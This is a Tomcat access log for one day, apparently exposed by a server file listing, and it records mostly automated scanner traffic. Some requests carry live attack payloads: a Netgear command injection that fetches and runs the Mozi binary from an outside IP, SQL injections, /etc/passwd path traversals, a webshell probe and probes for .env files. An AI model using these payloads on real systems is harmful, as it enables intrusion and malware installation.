| Current File : //usr/local/tomcat8/logs/localhost_access_log.2025-10-19.txt |
204.76.203.15 - - [19/Oct/2025:00:07:53 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:00:09:54 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.219 - - [19/Oct/2025:00:14:33 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.219 - - [19/Oct/2025:00:18:35 +0530] "GET / HTTP/1.1" 200 11250
20.163.15.177 - - [19/Oct/2025:00:22:24 +0530] "GET /hudson HTTP/1.1" 404 1006
20.163.15.177 - - [19/Oct/2025:00:22:53 +0530] "GET /hudson HTTP/1.1" 404 1006
103.157.204.197 - - [19/Oct/2025:00:37:33 +0530] "CONNECT www.google.com:443 HTTP/1.1" 400 -
176.65.149.21 - - [19/Oct/2025:00:40:29 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:00:40:46 +0530] "GET / HTTP/1.1" 200 11250
64.227.88.183 - - [19/Oct/2025:00:42:36 +0530] "GET /.env HTTP/1.1" 404 1002
64.227.88.183 - - [19/Oct/2025:00:42:37 +0530] "GET /.git/config HTTP/1.1" 404 1016
204.76.203.15 - - [19/Oct/2025:01:08:35 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:01:09:21 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.212 - - [19/Oct/2025:01:12:16 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.212 - - [19/Oct/2025:01:19:11 +0530] "GET / HTTP/1.1" 200 11250
176.65.148.11 - - [19/Oct/2025:01:26:50 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:01:53:34 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:01:53:44 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:02:08:57 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:02:09:18 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.219 - - [19/Oct/2025:02:17:23 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.219 - - [19/Oct/2025:02:19:15 +0530] "GET / HTTP/1.1" 200 11250
195.96.129.4 - - [19/Oct/2025:02:22:43 +0530] "GET / HTTP/1.1" 200 11250
195.96.129.4 - - [19/Oct/2025:02:33:52 +0530] "GET / HTTP/1.1" 200 11250
198.235.24.246 - - [19/Oct/2025:02:50:21 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:03:05:21 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:03:06:22 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:03:06:42 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:03:07:27 +0530] "GET / HTTP/1.1" 200 11250
79.124.40.174 - - [19/Oct/2025:03:28:56 +0530] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 11250
79.124.40.174 - - [19/Oct/2025:03:30:45 +0530] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 11250
79.124.40.174 - - [19/Oct/2025:03:54:11 +0530] "GET /actuator/gateway/routes HTTP/1.1" 404 1040
79.124.40.174 - - [19/Oct/2025:03:54:57 +0530] "GET /actuator/gateway/routes HTTP/1.1" 404 1040
204.76.203.15 - - [19/Oct/2025:04:05:24 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:04:07:43 +0530] "GET / HTTP/1.1" 200 11250
176.65.148.11 - - [19/Oct/2025:04:07:59 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.233 - - [19/Oct/2025:04:09:45 +0530] "CONNECT ipv4.icanhazip.com:443 HTTP/1.1" 400 -
204.76.203.233 - - [19/Oct/2025:04:10:15 +0530] "CONNECT ipv4.icanhazip.com:443 HTTP/1.1" 400 -
176.65.149.21 - - [19/Oct/2025:04:19:19 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:04:19:28 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.219 - - [19/Oct/2025:04:20:54 +0530] "GET / HTTP/1.1" 200 11250
103.199.200.160 - - [19/Oct/2025:04:21:14 +0530] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.199.200.160:47069/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 1012
204.76.203.212 - - [19/Oct/2025:04:25:22 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.219 - - [19/Oct/2025:04:26:29 +0530] "GET / HTTP/1.1" 200 11250
176.65.148.11 - - [19/Oct/2025:04:26:31 +0530] "GET / HTTP/1.1" 200 11250
103.157.204.197 - - [19/Oct/2025:04:27:06 +0530] "CONNECT www.google.com:443 HTTP/1.1" 400 -
198.235.24.74 - - [19/Oct/2025:04:27:51 +0530] "GET / HTTP/1.0" 200 11230
204.76.203.28 - - [19/Oct/2025:04:29:15 +0530] "-" 400 -
204.76.203.28 - - [19/Oct/2025:04:29:17 +0530] "-" 400 -
204.76.203.28 - - [19/Oct/2025:04:29:18 +0530] "-" 400 -
204.76.203.28 - - [19/Oct/2025:04:29:19 +0530] "-" 400 -
204.76.203.28 - - [19/Oct/2025:04:29:20 +0530] "-" 400 -
204.76.203.28 - - [19/Oct/2025:04:29:20 +0530] "-" 400 -
204.76.203.28 - - [19/Oct/2025:04:29:22 +0530] "-" 400 -
204.76.203.28 - - [19/Oct/2025:04:29:22 +0530] "-" 400 -
204.76.203.28 - - [19/Oct/2025:04:29:23 +0530] "-" 400 -
204.76.203.28 - - [19/Oct/2025:04:29:24 +0530] "-" 400 -
204.76.203.28 - - [19/Oct/2025:04:29:25 +0530] "-" 400 -
204.76.203.28 - - [19/Oct/2025:04:34:12 +0530] "-" 400 -
204.76.203.212 - - [19/Oct/2025:04:40:28 +0530] "GET / HTTP/1.1" 200 11250
45.142.193.27 - - [19/Oct/2025:04:46:06 +0530] "GET / HTTP/1.1" 200 11250
45.142.193.27 - - [19/Oct/2025:04:49:46 +0530] "GET / HTTP/1.1" 200 11250
195.96.129.4 - - [19/Oct/2025:04:51:56 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:05:04:40 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:05:05:23 +0530] "GET / HTTP/1.1" 200 11250
91.230.168.3 - - [19/Oct/2025:05:13:09 +0530] "-" 400 -
91.230.168.7 - - [19/Oct/2025:05:13:13 +0530] "GET / HTTP/1.1" 200 11250
195.184.76.20 - - [19/Oct/2025:05:31:06 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
176.65.149.21 - - [19/Oct/2025:05:32:15 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:05:32:21 +0530] "GET / HTTP/1.1" 200 11250
194.165.16.163 - - [19/Oct/2025:05:52:03 +0530] "-" 400 -
87.120.191.84 - - [19/Oct/2025:05:53:12 +0530] "GET / HTTP/1.1" 200 11250
184.105.247.252 - - [19/Oct/2025:05:55:03 +0530] "GET / HTTP/1.1" 200 11250
184.105.139.69 - - [19/Oct/2025:05:55:23 +0530] "GET / HTTP/1.1" 200 11250
184.105.247.252 - - [19/Oct/2025:05:55:38 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
184.105.247.252 - - [19/Oct/2025:05:55:47 +0530] "GET /?format=json HTTP/1.1" 200 11250
184.105.247.252 - - [19/Oct/2025:05:55:57 +0530] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 -
184.105.247.252 - - [19/Oct/2025:05:56:05 +0530] "GET /geoserver/web/ HTTP/1.1" 404 1022
184.105.139.109 - - [19/Oct/2025:05:56:10 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
184.105.139.113 - - [19/Oct/2025:05:56:23 +0530] "GET /?format=json HTTP/1.1" 200 11250
184.105.139.113 - - [19/Oct/2025:05:56:30 +0530] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 -
184.105.139.69 - - [19/Oct/2025:05:56:42 +0530] "GET /geoserver/web/ HTTP/1.1" 404 1022
204.76.203.15 - - [19/Oct/2025:06:02:44 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:06:03:23 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.219 - - [19/Oct/2025:06:17:02 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.219 - - [19/Oct/2025:06:27:12 +0530] "GET / HTTP/1.1" 200 11250
87.120.191.84 - - [19/Oct/2025:06:27:34 +0530] "GET / HTTP/1.1" 200 11250
185.169.4.150 - - [19/Oct/2025:06:29:34 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:06:45:02 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:06:45:04 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:07:03:36 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:07:04:24 +0530] "GET / HTTP/1.1" 200 11250
198.235.24.54 - - [19/Oct/2025:07:13:20 +0530] "-" 400 -
198.235.24.54 - - [19/Oct/2025:07:13:20 +0530] "-" 400 -
64.227.65.183 - - [19/Oct/2025:07:35:20 +0530] "GET / HTTP/1.1" 200 11250
64.227.65.183 - - [19/Oct/2025:07:35:21 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
176.65.148.11 - - [19/Oct/2025:07:37:39 +0530] "GET / HTTP/1.1" 200 11250
195.96.129.4 - - [19/Oct/2025:07:43:21 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.212 - - [19/Oct/2025:07:52:58 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:07:58:10 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:07:58:35 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:08:02:02 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:08:02:59 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.212 - - [19/Oct/2025:08:04:44 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.30 - - [19/Oct/2025:08:09:14 +0530] "GET /login HTTP/1.1" 404 1004
204.76.203.219 - - [19/Oct/2025:08:20:07 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.30 - - [19/Oct/2025:08:21:05 +0530] "GET /login HTTP/1.1" 404 1004
204.76.203.219 - - [19/Oct/2025:08:22:27 +0530] "GET / HTTP/1.1" 200 11250
176.65.148.11 - - [19/Oct/2025:08:38:47 +0530] "GET / HTTP/1.1" 200 11250
147.185.132.22 - - [19/Oct/2025:08:47:41 +0530] "GET / HTTP/1.1" 200 11250
93.123.109.222 - - [19/Oct/2025:08:49:16 +0530] "GET /login HTTP/1.1" 404 1004
204.76.203.15 - - [19/Oct/2025:09:00:41 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:09:02:02 +0530] "GET / HTTP/1.1" 200 11250
104.248.187.146 - - [19/Oct/2025:09:09:00 +0530] "GET /.env HTTP/1.1" 404 1002
104.248.187.146 - - [19/Oct/2025:09:09:01 +0530] "GET /.git/config HTTP/1.1" 404 1016
176.65.149.21 - - [19/Oct/2025:09:11:16 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:09:11:18 +0530] "GET / HTTP/1.1" 200 11250
64.62.197.62 - - [19/Oct/2025:09:13:36 +0530] "-" 400 -
185.169.4.150 - - [19/Oct/2025:09:15:09 +0530] "GET / HTTP/1.1" 200 11250
213.209.143.66 - - [19/Oct/2025:09:29:36 +0530] "GET / HTTP/1.1" 200 11250
159.223.9.99 - - [19/Oct/2025:09:33:05 +0530] "-" 400 -
159.223.9.99 - - [19/Oct/2025:09:33:06 +0530] "-" 400 -
159.223.9.99 - - [19/Oct/2025:09:33:06 +0530] "GET / HTTP/1.1" 200 11250
159.223.9.99 - - [19/Oct/2025:09:33:06 +0530] "GET /download/powershell/ HTTP/1.1" 404 1034
159.223.9.99 - - [19/Oct/2025:09:33:07 +0530] "GET /get.php HTTP/1.1" 404 1008
213.209.143.66 - - [19/Oct/2025:09:37:29 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:10:02:12 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:10:02:25 +0530] "GET / HTTP/1.1" 200 11250
195.96.129.4 - - [19/Oct/2025:10:06:42 +0530] "GET / HTTP/1.1" 200 11250
79.140.156.175 - - [19/Oct/2025:10:08:43 +0530] "GET / HTTP/1.1" 200 11250
196.251.116.191 - - [19/Oct/2025:10:08:47 +0530] "-" 400 -
196.251.116.191 - - [19/Oct/2025:10:08:48 +0530] "-" 400 -
196.251.116.191 - - [19/Oct/2025:10:08:50 +0530] "-" 400 -
196.251.116.191 - - [19/Oct/2025:10:08:51 +0530] "-" 400 -
196.251.116.191 - - [19/Oct/2025:10:08:52 +0530] "-" 400 -
196.251.116.191 - - [19/Oct/2025:10:08:53 +0530] "-" 400 -
196.251.116.191 - - [19/Oct/2025:10:08:55 +0530] "-" 400 -
45.82.78.100 - - [19/Oct/2025:10:12:33 +0530] "-" 400 -
45.82.78.100 - - [19/Oct/2025:10:12:44 +0530] "-" 400 -
45.82.78.100 - - [19/Oct/2025:10:12:44 +0530] "GET / HTTP/1.1" 200 11250
45.82.78.113 - - [19/Oct/2025:10:13:11 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
204.76.203.219 - - [19/Oct/2025:10:22:54 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:10:24:23 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:10:24:33 +0530] "GET / HTTP/1.1" 200 11250
45.142.193.27 - - [19/Oct/2025:10:26:00 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.219 - - [19/Oct/2025:10:27:43 +0530] "GET / HTTP/1.1" 200 11250
45.142.193.27 - - [19/Oct/2025:10:31:16 +0530] "GET / HTTP/1.1" 200 11250
87.120.191.84 - - [19/Oct/2025:10:37:06 +0530] "GET / HTTP/1.1" 200 11250
87.120.191.84 - - [19/Oct/2025:10:50:42 +0530] "GET / HTTP/1.1" 200 11250
198.235.24.167 - - [19/Oct/2025:10:51:09 +0530] "GET /.well-known/security.txt HTTP/1.1" 404 1042
167.94.138.47 - - [19/Oct/2025:10:52:35 +0530] "GET / HTTP/1.1" 200 11250
167.94.138.47 - - [19/Oct/2025:10:52:40 +0530] "GET / HTTP/1.1" 200 11250
167.94.138.47 - - [19/Oct/2025:10:52:41 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
167.94.138.47 - - [19/Oct/2025:10:52:46 +0530] "PRI * HTTP/2.0" 505 -
167.94.138.47 - - [19/Oct/2025:10:52:54 +0530] "PRI * HTTP/2.0" 505 -
167.94.138.47 - - [19/Oct/2025:10:53:02 +0530] "GET /wiki HTTP/1.1" 404 1002
66.132.153.112 - - [19/Oct/2025:10:53:34 +0530] "GET / HTTP/1.1" 200 11250
66.132.153.112 - - [19/Oct/2025:10:53:35 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
66.132.153.112 - - [19/Oct/2025:10:53:36 +0530] "PRI * HTTP/2.0" 505 -
66.132.153.112 - - [19/Oct/2025:10:53:42 +0530] "PRI * HTTP/2.0" 505 -
66.132.153.112 - - [19/Oct/2025:10:53:43 +0530] "GET /wiki HTTP/1.1" 404 1002
204.76.203.15 - - [19/Oct/2025:10:58:50 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:11:00:23 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.212 - - [19/Oct/2025:11:04:24 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.212 - - [19/Oct/2025:11:04:47 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:11:37:18 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:11:37:31 +0530] "GET / HTTP/1.1" 200 11250
176.65.148.11 - - [19/Oct/2025:11:37:40 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:12:01:32 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:12:02:08 +0530] "GET / HTTP/1.1" 200 11250
65.49.1.66 - - [19/Oct/2025:12:11:25 +0530] "-" 400 -
204.76.203.219 - - [19/Oct/2025:12:19:01 +0530] "GET / HTTP/1.1" 200 11250
205.210.31.110 - - [19/Oct/2025:12:24:20 +0530] "GET /.well-known/security.txt HTTP/1.1" 404 1042
213.209.143.66 - - [19/Oct/2025:12:26:01 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.219 - - [19/Oct/2025:12:27:06 +0530] "GET / HTTP/1.1" 200 11250
213.209.143.66 - - [19/Oct/2025:12:30:08 +0530] "GET / HTTP/1.1" 200 11250
205.210.31.70 - - [19/Oct/2025:12:37:53 +0530] "GET /.well-known/security.txt HTTP/1.1" 404 1042
176.65.149.21 - - [19/Oct/2025:12:50:45 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:12:51:08 +0530] "GET / HTTP/1.1" 200 11250
195.96.129.4 - - [19/Oct/2025:12:54:00 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.28 - - [19/Oct/2025:12:54:14 +0530] "-" 400 -
204.76.203.28 - - [19/Oct/2025:12:54:28 +0530] "-" 400 -
139.59.15.151 - - [19/Oct/2025:12:57:51 +0530] "GET / HTTP/1.1" 200 11250
139.59.15.151 - - [19/Oct/2025:12:57:51 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
176.65.148.11 - - [19/Oct/2025:12:59:44 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:13:00:04 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:13:01:41 +0530] "GET / HTTP/1.1" 200 11250
198.235.24.247 - - [19/Oct/2025:13:07:05 +0530] "-" 400 -
198.235.24.247 - - [19/Oct/2025:13:07:06 +0530] "-" 400 -
205.185.122.202 - - [19/Oct/2025:13:23:52 +0530] "-" 400 -
205.185.122.202 - - [19/Oct/2025:13:23:53 +0530] "-" 400 -
205.185.122.202 - - [19/Oct/2025:13:23:53 +0530] "-" 400 -
205.185.122.202 - - [19/Oct/2025:13:23:53 +0530] "-" 400 -
205.185.122.202 - - [19/Oct/2025:13:23:54 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:13:23:54 +0530] "GET / HTTP/1.1" 200 11250
20.169.107.13 - - [19/Oct/2025:13:29:02 +0530] "-" 400 -
205.210.31.192 - - [19/Oct/2025:13:31:21 +0530] "GET / HTTP/1.0" 200 11230
192.159.99.101 - - [19/Oct/2025:13:31:33 +0530] "GET / HTTP/1.1" 200 11250
167.94.138.191 - - [19/Oct/2025:13:49:09 +0530] "GET / HTTP/1.1" 200 11250
167.94.138.191 - - [19/Oct/2025:13:49:10 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
167.94.138.191 - - [19/Oct/2025:13:49:11 +0530] "PRI * HTTP/2.0" 505 -
167.94.138.191 - - [19/Oct/2025:13:49:17 +0530] "PRI * HTTP/2.0" 505 -
167.94.138.191 - - [19/Oct/2025:13:49:17 +0530] "GET /wiki HTTP/1.1" 404 1002
204.76.203.15 - - [19/Oct/2025:13:59:16 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:00:09 +0530] "GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:00:09 +0530] "GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:00:09 +0530] "POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1" 404 1090
205.185.122.202 - - [19/Oct/2025:14:00:10 +0530] "POST /uapjs/jsinvoke/?action=invoke HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:14:00:10 +0530] "POST /WEB_VMS/LEVEL15/ HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:00:10 +0530] "GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:14:00:10 +0530] "POST /WEB_VMS/LEVEL15/ HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:00:10 +0530] "POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1" 404 1090
205.185.122.202 - - [19/Oct/2025:14:00:10 +0530] "POST /uapjs/jsinvoke/?action=invoke HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:14:00:10 +0530] "GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:14:00:10 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:00:10 +0530] "POST /_vti_bin/shtml.exe/_vti_rpc HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:14:00:10 +0530] "POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:14:00:11 +0530] "POST /_vti_bin/shtml.exe/_vti_rpc HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:14:00:11 +0530] "POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:14:00:11 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:00:12 +0530] "POST /bsh.servlet.BshServlet HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:14:00:12 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:00:12 +0530] "POST /mobile/plugin/browser.jsp HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:14:00:12 +0530] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:14:00:12 +0530] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:14:00:12 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:00:12 +0530] "POST /mobile/plugin/browser.jsp HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:14:00:12 +0530] "POST /bsh.servlet.BshServlet HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:14:00:13 +0530] "GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.1" 404 1090
205.185.122.202 - - [19/Oct/2025:14:00:13 +0530] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:14:00:13 +0530] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:14:00:13 +0530] "GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.1" 404 1090
205.185.122.202 - - [19/Oct/2025:14:00:13 +0530] "GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:14:00:13 +0530] "GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:14:00:13 +0530] "GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:14:00:13 +0530] "GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:14:00:13 +0530] "GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:14:00:14 +0530] "GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:14:00:14 +0530] "POST /zentao/user-login.html HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:14:00:15 +0530] "POST /index.php/User/doLogin HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:14:00:15 +0530] "POST /index.php/User/doLogin HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:14:00:15 +0530] "POST /zentao/user-login.html HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:14:00:20 +0530] "POST /cgi-bin/rpc HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:14:00:20 +0530] "POST /cgi-bin/rpc HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:14:00:20 +0530] "GET /users/sign_in HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:14:00:20 +0530] "GET /users/sign_in HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:14:00:22 +0530] "POST /index.php?s=/home/page/uploadImg HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:14:00:22 +0530] "POST /index.php?s=/home/page/uploadImg HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:14:00:23 +0530] "POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:14:00:23 +0530] "POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:14:00:26 +0530] "GET /images/logo/logo-eoffice.php HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:14:00:26 +0530] "GET /images/logo/logo-eoffice.php HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:14:00:27 +0530] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:14:00:27 +0530] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:14:00:28 +0530] "POST /seeyon/htmlofficeservlet HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:14:00:29 +0530] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:14:00:29 +0530] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:14:00:30 +0530] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:14:00:30 +0530] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:14:00:30 +0530] "POST /seeyon/htmlofficeservlet HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:14:00:31 +0530] "GET /seeyon/test123456.jsp?pwd=asasd3344&34HFRsdeCGAyPr0qkdhl2aBHTiK=ipconfig HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:14:00:31 +0530] "POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:14:00:31 +0530] "POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:14:00:33 +0530] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:14:00:33 +0530] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:14:00:33 +0530] "GET /seeyon/test123456.jsp?pwd=asasd3344&34HFRsdeCGAyPr0qkdhl2aBHTiK=ipconfig HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:14:00:35 +0530] "GET /public/index.php/home/file/user_pics HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:14:00:35 +0530] "GET /public/index.php/home/file/user_pics HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:14:00:40 +0530] "GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:00:41 +0530] "GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:00:44 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:00:44 +0530] "GET / HTTP/1.1" 200 11250
